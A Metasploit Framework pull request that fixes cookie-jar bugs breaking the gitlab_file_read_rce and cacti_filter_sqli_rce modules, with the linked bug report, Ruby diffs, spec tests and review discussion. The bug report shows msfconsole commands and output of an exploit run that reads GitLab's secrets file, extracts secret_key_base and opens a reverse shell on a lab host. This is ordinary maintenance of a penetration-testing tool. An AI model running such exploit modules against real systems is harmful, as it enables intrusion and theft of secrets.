### PR TITLE
Cookie jar fix for gitlab exploit module issues

### LINKED ISSUE #15456: multi/http/gitlab_file_read_rce ArgumentError wrong number of arguments (given 3, expected 1..2)
## Steps to reproduce

How'd you do it?

1. use multi/http/gitlab_file_read_rce
2. set username xxxx
3. set password yyyy
4. set rhost x.x.x.x
5. set lhost tap0
6. exploit

This exploit worked today with version 6.0.45-dev. After upgrading to 6.0.53-dev, I see the error.

Victim OS: `Linux [redacted] 5.4.0-67-generic #75-Ubuntu SMP Fri Feb 19 18:03:38 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux`

## Were you following a specific guide/tutorial or reading documentation?

No

## Expected behavior

```
msf6 exploit(multi/http/gitlab_file_read_rce) > exploit

[*] Started reverse TCP handler on 172.16.10.215:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. GitLab 12.8.5 is a vulnerable version.
[*] Logged in to user kur3us
[*] Created project /kur3us/u6SJisor
[*] Created project /kur3us/6EAnFb4N
[*] Created issue /kur3us/u6SJisor/issues/1
[*] Executing arbitrary file load
[+] File saved as: '/root/.msf4/loot/20210721140532_default_172.16.11.40_gitlab.secrets_667107.txt'
[+] Extracted secret_key_base [redacted]
[*] NOTE: Setting the SECRET_KEY_BASE option with the above value will skip this arbitrary file read
[*] Attempting to delete project /kur3us/u6SJisor
[*] Deleted project /kur3us/u6SJisor
[*] Attempting to delete project /kur3us/6EAnFb4N
[*] Deleted project /kur3us/6EAnFb4N
[*] Command shell session 3 opened (172.16.10.215:4444 -> 172.16.11.40:41794) at 2021-07-21 14:05:38 -0400

id
uid=996(git) gid=997(git) groups=997(git)
exit
```

## Current behavior

```
msf6 exploit(multi/http/gitlab_file_read_rce) > exploit

[*] Started reverse TCP handler on 172.16.10.215:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Exploit failed: ArgumentError wrong number of arguments (given 3, expected 1..2)
[*] Exploit completed, but no session was created.
```

### Metasploit version
```
Framework: 6.0.53-dev
Console  : 6.0.53-dev
```

##  Module/Datastore

The following global/module datastore, and database setup was configured before the issue occurred:
<details>
<summary>Collapse</summary>

```
[framework/ui/console]
ActiveModule=exploit/multi/http/gitlab_file_read_rce

[multi/http/gitlab_file_read_rce]
WORKSPACE=
VERBOSE=false
WfsDelay=2
EnableContextEncoding=false
ContextInformationFile=
DisablePayloadHandler=false
RHOSTS=172.16.11.40
RPORT=80
VHOST=
SSL=false
Proxies=
UserAgent=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HttpUsername=
HttpPassword=
HttpRawHeaders=
DigestAuthIIS=true
SSLVersion=Auto
FingerprintCheck=true
DOMAIN=WORKSTATION
HttpClientTimeout=
HttpTrace=false
HttpTraceHeadersOnly=false
HttpTraceColors=red/blu
HTTP::uri_encode_mode=hex-normal
HTTP::uri_full_url=false
HTTP::pad_method_uri_count=1
HTTP::pad_uri_version_count=1
HTTP::pad_method_uri_type=space
HTTP::pad_uri_version_type=space
HTTP::method_random_valid=false
HTTP::method_random_invalid=false
HTTP::method_random_case=false
HTTP::version_random_valid=false
HTTP::version_random_invalid=false
HTTP::uri_dir_self_reference=false
HTTP::uri_dir_fake_relative=false
HTTP::uri_use_backslashes=false
HTTP::pad_fake_headers=false
HTTP::pad_fake_headers_count=0
HTTP::pad_get_params=false
HTTP::pad_get_params_count=16
HTTP::pad_post_params=false
HTTP::pad_post_params_count=16
HTTP::uri_fake_end=false
HTTP::uri_fake_params_start=false
HTTP::header_folding=false
USERNAME=kur3us
PASSWORD=[Redacted]
TARGETURI=/users/sign_in
SECRETS_PATH=/opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml
SECRET_KEY_BASE=
DEPTH=15
SignedCookieSalt=signed cookie
KeyGeneratorIterations=1000
AutoCheck=true
ForceExploit=false
PAYLOAD=generic/shell_reverse_tcp
LHOST=tap0
loglevel=3
```

</details>

##  History

The following commands were ran during the session and before this issue occurred:
<details>
<summary>Collapse</summary>

```
2000   use multi/http/gitlab_file_read_rce
2001   set username kur3us
2002   set password kur3us!!
2003   set rhost 172.16.11.40
2004   set lhost tap0
2005   exploit
2006   debug
```

</details>

##  Framework Errors

The following framework errors occurred before the issue occurred:
<details>
<summary>Collapse</summary>

```
[07/21/2021 15:04:54] [e(0)] core: Failed to connect to the database: could not connect to server: Connection refused
        Is the server running on host "localhost" (::1) and accepting
        TCP/IP connections on port 5432?
could not connect to server: Connection refused
        Is the server running on host "localhost" (127.0.0.1) and accepting
        TCP/IP connections on port 5432?

[07/21/2021 15:04:56] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[07/21/2021 15:04:56] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[07/21/2021 15:04:56] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[07/21/2021 15:04:56] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[07/21/2021 15:05:03] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[07/21/2021 15:05:03] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[07/21/2021 15:05:03] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[07/21/2021 15:05:03] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[07/21/2021 15:05:22] [e(0)] core: Exploit failed (multi/http/gitlab_file_read_rce): ArgumentError wrong number of arguments (given 3, expected 1..2) - ArgumentError wrong number of arguments (given 3, expected 1..2)
```

</details>

##  Web Service Errors

The following web service errors occurred before the issue occurred:
<details>
<summary>Collapse</summary>

```
msf-ws.log does not exist.
```

</details>

##  Framework Logs

The following framework logs were recorded before the issue occurred:
<details>
<summary>Collapse</summary>

```
TCP/IP connections on port 5432?

[07/21/2021 14:39:02] [d(0)] core: Updated user based module store
[07/21/2021 14:39:05] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[07/21/2021 14:39:05] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[07/21/2021 14:39:05] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[07/21/2021 14:39:05] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[07/21/2021 14:39:06] [d(0)] core: HistoryManager.push_context name: :msfconsole
[07/21/2021 14:39:50] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[07/21/2021 14:39:50] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[07/21/2021 14:39:50] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[07/21/2021 14:39:50] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[07/21/2021 14:40:23] [e(0)] core: Exploit failed (multi/http/gitlab_file_read_rce): ArgumentError wrong number of arguments (given 3, expected 1..2) - ArgumentError wrong number of arguments (given 3, expected 1..2)
[07/21/2021 14:46:47] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[07/21/2021 14:46:47] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[07/21/2021 14:46:47] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[07/21/2021 14:46:47] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[07/21/2021 15:04:43] [e(0)] core: Exploit failed (multi/http/gitlab_file_read_rce): ArgumentError wrong number of arguments (given 3, expected 1..2) - ArgumentError wrong number of arguments (given 3, expected 1..2)
[07/21/2021 15:04:48] [d(0)] core: HistoryManager.pop_context name: :msfconsole
[07/21/2021 15:04:54] [i(0)] core: Trying to continue despite failed database creation: could not connect to server: Connection refused
        Is the server running on host "localhost" (::1) and accepting
        TCP/IP connections on port 5432?
could not connect to server: Connection refused
        Is the server running on host "localhost" (127.0.0.1) and accepting
        TCP/IP connections on port 5432?

[07/21/2021 15:04:54] [e(0)] core: DB.connect threw an exception - PG::ConnectionBad could not connect to server: Connection refused
        Is the server running on host "localhost" (::1) and accepting
        TCP/IP connections on port 5432?
could not connect to server: Connection refused
        Is the server running on host "localhost" (127.0.0.1) and accepting
        TCP/IP connections on port 5432?

[07/21/2021 15:04:54] [e(0)] core: Failed to connect to the database: could not connect to server: Connection refused
        Is the server running on host "localhost" (::1) and accepting
        TCP/IP connections on port 5432?
could not connect to server: Connection refused
        Is the server running on host "localhost" (127.0.0.1) and accepting
        TCP/IP connections on port 5432?

[07/21/2021 15:04:56] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[07/21/2021 15:04:56] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[07/21/2021 15:04:56] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[07/21/2021 15:04:56] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[07/21/2021 15:04:57] [d(0)] core: HistoryManager.push_context name: :msfconsole
[07/21/2021 15:05:03] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[07/21/2021 15:05:03] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[07/21/2021 15:05:03] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[07/21/2021 15:05:03] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[07/21/2021 15:05:22] [e(0)] core: Exploit failed (multi/http/gitlab_file_read_rce): ArgumentError wrong number of arguments (given 3, expected 1..2) - ArgumentError wrong number of arguments (given 3, expected 1..2)
```

</details>

##  Web Service Logs

The following web service logs were recorded before the issue occurred:
<details>
<summary>Collapse</summary>

```
msf-ws.log does not exist.
```

</details>

##  Version/Install

The versions and install method of your Metasploit setup:
<details>
<summary>Collapse</summary>

```
Framework: 6.0.53-dev
Ruby: ruby 2.7.4p191 (2021-07-07 revision a21a3b7d23) [x86_64-linux-gnu]
Install Root: /usr/share/metasploit-framework
Session Type: postgresql selected, no connection
Install Method: Other - Please specify
```

</details>

### PR DESCRIPTION
**Pull request by agalway-r7**
Fixes https://github.com/rapid7/metasploit-framework/issues/15456

This fixes two issues with the cookie jar and it's use by the http client, one big and one small:
1) I incorrectly authored the http_cookie_jar `parse` method to create cookies without considering set-cookie headers with no additional attributes.
2) Requests made to an IP address without knowledge of said IP address' domain name (say for example when making requests via a VPN like the one's used in TryHackMe & HackTheBox), would result in the creation of a cookie without a domain attribute, which would cause the `http-cookie` library our jar is built on top of to throw an error. The work around for this is to create an origin for each cookie, which would populate the domain field **if a domain attribute isn't already specified by the server**. 

This may break in the future if the domain is set to the target rhost of a module and if the target server begins to interpret said domain incorrectly and create an error, since a IP address isn't a valid domain. However, in the two modules this PR fixes (`gitlab_file_read_rce` and `cacti_filter_sqli_rce`), said invalid domain is simply ignored and the cookie is treated as a default value, which is the desired functionality.  

List the steps needed to make sure this thing works

- [ ] Create a [cacti testing environment](https://github.com/rapid7/metasploit-framework/pull/15122/files#diff-82d7f56d21b1de07989f59e63089807c87cc1bf37b904175a70d62adbf195dcbR18-R24)
- [ ] `use exploit/unix/http/cacti_filter_sqli_rce`
- [ ] ensure module executes successfully

- [ ] Create a [gitlab testing environment](https://github.com/rapid7/metasploit-framework/pull/14422/files#diff-6d4d4dde676983baa2fc614c666b022663112cc36716bae64c28777fa9e41eeaR24-R29)
- [ ] `use exploit/multi/http/gitlab_file_read_rce`
- [ ] ensure module executes successfully

### CODE REVIEW

File: lib/msf/core/exploit/remote/http/http_cookie_jar.rb [hunk 1]
```diff
@@ -29,8 +29,12 @@ def initialize
           def add(cookie)
             raise TypeError, "Passed cookie is of class '#{cookie.class}' and not a subclass of '#{Msf::Exploit::Remote::HTTP::HttpCookie}" unless cookie.is_a?(Msf::Exploit::Remote::HTTP::HttpCookie)
 
-            @cookie_jar.add(cookie)
-            self
+            begin
+              @cookie_jar.add(cookie)
+              self
+            rescue ArgumentError => e
+              elog("Cookie #{cookie.to_s} could not be added to jar. Error was thrown with following message:\n#{e.message}")
```
Comment (dwelch-r7) [inline lib/msf/core/exploit/remote/http/http_cookie_jar.rb:36]: I think `elog` can have the error passed in as an argument like this
```suggestion
              elog("Cookie #{cookie.to_s} could not be added to jar. Error was thrown with following message:\n#{e.message}", error: e)
```

File: lib/msf/core/exploit/remote/http/http_cookie_jar.rb [hunk 2]
```diff
@@ -80,7 +84,11 @@ def parse(set_cookie_header)
                 next
               end
 
-              cookies << HttpCookie.new(name, value, attrs)
+              if attrs.is_a?(Hash)
+                cookies << HttpCookie.new(name, value, **attrs)
+              else
+                cookies << HttpCookie.new(name, value)
+              end
```
Comment (dwelch-r7) [inline lib/msf/core/exploit/remote/http/http_cookie_jar.rb:91]: this seems a little off to me, someone passing in attrs that isn't a hash and it just gets ignored, can it be anything other than a hash? if not maybe a guard clause or at least a warning

File: lib/msf/core/exploit/remote/http_client.rb [hunk 3]
```diff
@@ -395,7 +395,12 @@ def send_request_cgi(opts = {}, timeout = 20, disconnect = true)
     return unless res
 
     if opts['keep_cookies'] && res.headers['Set-Cookie'].present?
-      cookie_jar.parse_and_merge(res.headers['Set-Cookie'])
+      cookies = cookie_jar.parse(res.headers['Set-Cookie'])
+
+      cookies.each do |c|
+        c.origin = "http#{ssl ? 's' : ''}://#{vhost}:#{rport}"
```
Comment (dwelch-r7) [inline lib/msf/core/exploit/remote/http_client.rb:401]: can the vhost ever be nil? I don't think it can I think it defaults to the ip if it's not set but just wanted to call it out to be sure

**Review by dwelch-r7 — CHANGES_REQUESTED** [review]

File: lib/msf/core/exploit/remote/http_client.rb [hunk 4]
```diff
@@ -395,7 +395,12 @@ def send_request_cgi(opts = {}, timeout = 20, disconnect = true)
     return unless res
 
     if opts['keep_cookies'] && res.headers['Set-Cookie'].present?
-      cookie_jar.parse_and_merge(res.headers['Set-Cookie'])
+      cookies = cookie_jar.parse(res.headers['Set-Cookie'])
```
Comment (adfoster-r7) [inline lib/msf/core/exploit/remote/http_client.rb:398]: Would it be easier for parse to take the origin/path like it did before?

https://github.com/rapid7/metasploit-framework/pull/15225/files#diff-181d5970bce86f6a48bb550ed0dbade6ea0d946645995e0ff7884e85fe3fe91aR402

File: lib/msf/core/exploit/remote/http_client.rb (hunk 3 above)
Comment (agalway-r7) [reply lib/msf/core/exploit/remote/http_client.rb:401]: Aye VHOST can be nil, in which case it gets set to RHOST 👍 
https://github.com/rapid7/metasploit-framework/blob/569660b8904a7a34c75f2f9ea044cda75c64640f/lib/msf/core/exploit/remote/http_client.rb#L653

File: lib/msf/core/exploit/remote/http_client.rb (hunk 4 above)
Comment (agalway-r7) [reply lib/msf/core/exploit/remote/http_client.rb:398]: IMO we'd want the cookie & cookie_jar classes to stay as generic as possible. If we set parse to take an origin that means we're forcing users to generate an origin when they don't know how/don't want to. 

Parse returns a cookie class with an origin setter, so they can set origin using that if they want to.

File: lib/msf/core/exploit/remote/http/http_cookie_jar.rb [hunk 5]
```diff
@@ -29,8 +29,12 @@ def initialize
...
             raise TypeError, "Passed cookie is of class '#{cookie.class}' and not a subclass of '#{Msf::Exploit::Remote::HTTP::HttpCookie}" unless cookie.is_a?(Msf::Exploit::Remote::HTTP::HttpCookie)
 
-            @cookie_jar.add(cookie)
-            self
+            begin
+              @cookie_jar.add(cookie)
+              self
+            rescue ArgumentError => e
+              elog("Cookie #{cookie.to_s} could not be added to jar. Error was thrown with following message:\n#{e.message}", error: e)
+            end
```
Comment (adfoster-r7) [inline lib/msf/core/exploit/remote/http/http_cookie_jar.rb:37]:
```suggestion
            begin
              @cookie_jar.add(cookie)
            rescue ArgumentError => e
              elog("Cookie #{cookie.to_s} could not be added to jar. Error was thrown with following message:\n#{e.message}", error: e)
            end
            self
```

File: lib/msf/core/exploit/remote/http_client.rb (hunk 4 above)
Comment (adfoster-r7) [reply lib/msf/core/exploit/remote/http_client.rb:398]: From the original PR, it looks like the existing API already takes `origin` as a parameter, which  seems pretty single responsibility to me and something we could easily align on
```ruby
::HTTP::Cookie.parse(set_cookie_header, origin_url, options)
```

File: lib/msf/core/exploit/remote/http/http_cookie_jar.rb (hunk 2 above)
Comment (adfoster-r7) [inline lib/msf/core/exploit/remote/http/http_cookie_jar.rb:91]: What else can `attrs` be? 👀 

```suggestion
              cookies << HttpCookie.new(name, value, **attrs)
```

File: lib/msf/core/exploit/remote/http_client.rb (hunk 4 above)
Comment (agalway-r7) [reply lib/msf/core/exploit/remote/http_client.rb:398]: Yeah but the original way of doing it wasn't great either IMO. Thing is we can make a cookie without an origin via it's initializer and/or setters, so why should we make people pass an origin to parse the same cookie? Especially since the origin isn't actually essential, only a domain and path value _need_ to be set

File: lib/msf/core/exploit/remote/http/http_cookie_jar.rb (hunk 2 above)
Comment (agalway-r7) [reply lib/msf/core/exploit/remote/http/http_cookie_jar.rb:91]: `scan_set_cookie` can return`nil` in place of a hash as `attrs`, which will cause a `wrong number of arguments (given 3, expected 1..2) (ArgumentError)` error.  

I could replace the `if attrs.is_a?(Hash)` with `if attrs`, but some non hash value could be passed in the future if `scan_set_cookie` is changed or if another method entirely is used, which would also cause the above error, so IMO `is_a?(Hash)` is clearier since it indicates what it is we're looking for to ensure no errors.

Comment (agalway-r7) [reply lib/msf/core/exploit/remote/http/http_cookie_jar.rb:91]: See below

Comment (adfoster-r7) [reply lib/msf/core/exploit/remote/http/http_cookie_jar.rb:91]: How about
```
attrs ||= {}
cookies << HttpCookie.new(name, value, **attrs)
```

Comment (agalway-r7) [reply lib/msf/core/exploit/remote/http/http_cookie_jar.rb:87]: That still has the issue of attrs being a value that isn't nil but also isn't a hash

Comment (adfoster-r7) [reply lib/msf/core/exploit/remote/http/http_cookie_jar.rb:87]: Just checking the underlying code, I don't think a non-hash is yielded? 👀 

https://github.com/sparklemotion/http-cookie/blob/2578ebb536c4617fd3b343fb2468d1a3c5b705b8/lib/http/cookie/scanner.rb#L171

Comment (adfoster-r7) [reply lib/msf/core/exploit/remote/http/http_cookie_jar.rb:87]:
```suggestion
              raise ArgumentError, 'Expected attrs to be a Hash' unless attrs.is_a?(Hash)
              cookies << HttpCookie.new(name, value, **attrs)
```

File: spec/lib/msf/core/exploit/remote/remote/http/http_cookie_spec.rb [hunk 6]
```diff
@@ -397,6 +397,108 @@ def random_string(min_len = 1, max_len = 12)
     end
   end
 
+  describe 'origin' do
+    describe 'String' do
```
Comment (adfoster-r7) [inline spec/lib/msf/core/exploit/remote/remote/http/http_cookie_spec.rb:401]: I think these should be contexts?  https://www.betterspecs.org/

File: spec/lib/msf/core/exploit/remote/remote/http/http_cookie_spec.rb [hunk 7]
```diff
@@ -397,6 +397,108 @@ def random_string(min_len = 1, max_len = 12)
...
+        clazz = Class.new do
+        end
+        my_str = clazz.new
+
+        expect do
+          cookie.origin = my_str
+        end.to raise_error(ArgumentError)
+      end
+
+      it 'which is a kind of String representing a URI will be passed to origin successfully, and populate the domain & path fields correctly' do
```
Comment (adfoster-r7) [inline spec/lib/msf/core/exploit/remote/remote/http/http_cookie_spec.rb:482]:
```suggestion
      it 'which is a kind of String representing a URI will be passed to origin successfully, and populate the domain and path fields correctly' do
```

File: spec/lib/msf/core/exploit/remote/remote/http/http_cookie_spec.rb [hunk 8]
```diff
@@ -397,6 +397,108 @@ def random_string(min_len = 1, max_len = 12)
...
+
+      it 'that is empty is passed to name and throws an ArgumentError' do
+        n = ''
+
+        expect do
+          cookie.name = n
+        end.to raise_error(ArgumentError)
+      end
+
+      it 'representing a URI will be passed to origin successfully, and populate the domain & path fields correctly' do
```
Comment (adfoster-r7) [inline spec/lib/msf/core/exploit/remote/remote/http/http_cookie_spec.rb:419]:
```suggestion
      it 'representing a URI will be passed to origin successfully, and populate the domain and path fields correctly' do
```

File: spec/lib/msf/core/exploit/remote/remote/http/http_cookie_spec.rb [hunk 9]
```diff
@@ -397,6 +397,108 @@ def random_string(min_len = 1, max_len = 12)
...
+        path = "/#{random_string(5)}/"
+        protocol = "http#{rand(2) == 1 ? 's' : ''}"
+        my_str = "#{protocol}://#{domain}#{path}"
+
+        cookie.origin = my_str
+
+        expect(cookie.origin).to eql(URI(my_str))
+        expect(cookie.domain).to eql(domain)
+        expect(cookie.path).to eql(path)
+        expect(cookie.origin.class).to eql(protocol.end_with?('s') ? URI::HTTPS : URI::HTTP)
```
Comment (adfoster-r7) [inline spec/lib/msf/core/exploit/remote/remote/http/http_cookie_spec.rb:430]: Let's add two separate tests for this, instead of introducing non-deterministic tests :+1:

File: lib/msf/core/exploit/remote/http/http_cookie_jar.rb (hunk 2 above)
Comment (adfoster-r7) [reply lib/msf/core/exploit/remote/http/http_cookie_jar.rb:87]: We'll want tests for this scenario too then

```ruby
  describe '#parse' do
    it 'parses comma separated cookies' do
      input = "cross-site-cookie=bar; SameSite=Strict;, Cacti=qlf907tneuneajqbr00fge0ull; path=/cacti/; HttpOnly"
      expected = [
        # ...
      ]
      expect(subject.parse(input)).to eq(expected)
    end

    it 'validates that that the third party scan_set_cookie implementation always returns a hash' do
      allow_any_instance_of(::HTTP::Cookie::Scanner).to receive(:scan_set_cookie).and_yield "foo", "bar", nil
      input = "cross-site-cookie=bar; SameSite=Strict;, Cacti=qlf907tneuneajqbr00fge0ull; path=/cacti/; HttpOnly"
      expect { subject.parse(input) }.to raise_error /Expected attrs to be a Hash/
    end
  end
```

File: lib/msf/core/exploit/remote/http_client.rb (hunk 4 above)
Comment (adfoster-r7) [reply lib/msf/core/exploit/remote/http_client.rb:398]: I think the current approach is a leak of concerns, that would be better to consolidate inside the cookiejar itself - which is also the pattern of python's cookiejar implementation

File: spec/lib/msf/core/exploit/remote/remote/http/http_cookie_spec.rb [hunk 10]
```diff
@@ -397,6 +397,108 @@ def random_string(min_len = 1, max_len = 12)
...
+    describe 'nil' do
+      it 'assigned to name throws an ArgumentError' do
+        n = nil
+
+        expect do
+          cookie.name = n
+        end.to raise_error(ArgumentError)
+      end
+    end
+
```
Comment (adfoster-r7) [inline spec/lib/msf/core/exploit/remote/remote/http/http_cookie_spec.rb:455]:
```suggestion
```

File: lib/msf/core/exploit/remote/http/http_cookie.rb [hunk 11]
```diff
@@ -30,7 +30,7 @@ def initialize(name, value = nil, **attr_hash)
             end
 
             attr_hash.each_pair do |k, v|
-              if k == 'max-age'
+              if k == 'max-age'.to_sym
```
Comment (dwelch-r7) [inline lib/msf/core/exploit/remote/http/http_cookie.rb:33]: do you need to call `to_sym` on this? and if so why not just check if it's equal to `:max-age` instead?

**Review by dwelch-r7 — APPROVED** [review]

File: lib/msf/core/exploit/remote/http/http_cookie.rb (hunk 11 above)
Comment (adfoster-r7) [reply lib/msf/core/exploit/remote/http/http_cookie.rb:33]: That's a syntax error, you'd want `:'max-age'`

Comment (dwelch-r7) [reply lib/msf/core/exploit/remote/http/http_cookie.rb:33]: ohhh well that explains why it was done the way that it is :sweat_smile:

**Comment by adfoster-r7** [comment]
## Release Notes

Fixes a regression issue for `gitlab_file_read_rce` and `cacti_filter_sqli_rce`

**Comment by myusrn** [comment]
As noted in [15456](https://github.com/rapid7/metasploit-framework/issues/15456) comment I updated to latest 6.0.56-dev [ using `sudo apt upgrade metasploit-framework` ] and this issue still repros?  Will the fix for this regression not show up until a later package release?  Is there a way to install the fix straight from github repo?

**Comment by adfoster-r7** [comment]
Cross-referencing the response: https://github.com/rapid7/metasploit-framework/issues/15456#issuecomment-893071171
